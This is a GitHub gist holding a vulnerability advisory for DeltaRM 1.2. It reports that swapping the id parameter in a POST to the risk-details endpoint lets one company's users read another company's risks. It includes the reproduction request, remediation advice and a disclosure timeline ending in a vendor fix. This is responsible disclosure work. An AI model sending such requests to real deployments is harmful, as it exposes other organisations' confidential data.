Skip to content

Instantly share code, notes, and snippets.

Last active January 17, 2022 10:34
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?



  • Broken Access Controls in Risk Details between companies
  • Affected Product: DeltaRM 1.2
  • Vendor: DeltaRM
  • Severity: High
  • Vulnerability Class: Broken Access Controls
  • Status: Fixed
  • Author(s): Renato Cruz =======================================================================


An issue was discovered in Delta RM 1.2. > Using the /risque/risque/ajax-details endpoint, with a POST request indicating the risk to access with the id parameter, it is possible for users to access risks of other companies.

Reproduction Steps

As an authenticated user, send the following request

POST /risque/risque/ajax-details HTTP/1.1
Cookie: PHPSESSID=*session cookie*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

id=*another company id*&evalId=&appel=


The application needs to validate the current user roles and permissions, and guarantee that the user only has access to the expected allowed features and context.

  • With the exception of public resources, deny by default.
  • Log access control failures, alert admins when appropriate (e.g. repeated failures).
  • Rate limit API and controller access to minimize the harm from automated attack tooling.
  • JWT tokens should be invalidated on the server after logout.
  • Developers and QA staff should include functional access control unit and integration tests.

Disclosure Timeline

  • 26-10-2021: Vulnerability disclosed to DeltaRM
  • 28-10-2021: Acknowlegement from vendor
  • 11-12-2021: Fix released by the vendor
  • 10-01-2022: Retest performed, vulnerability fixed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment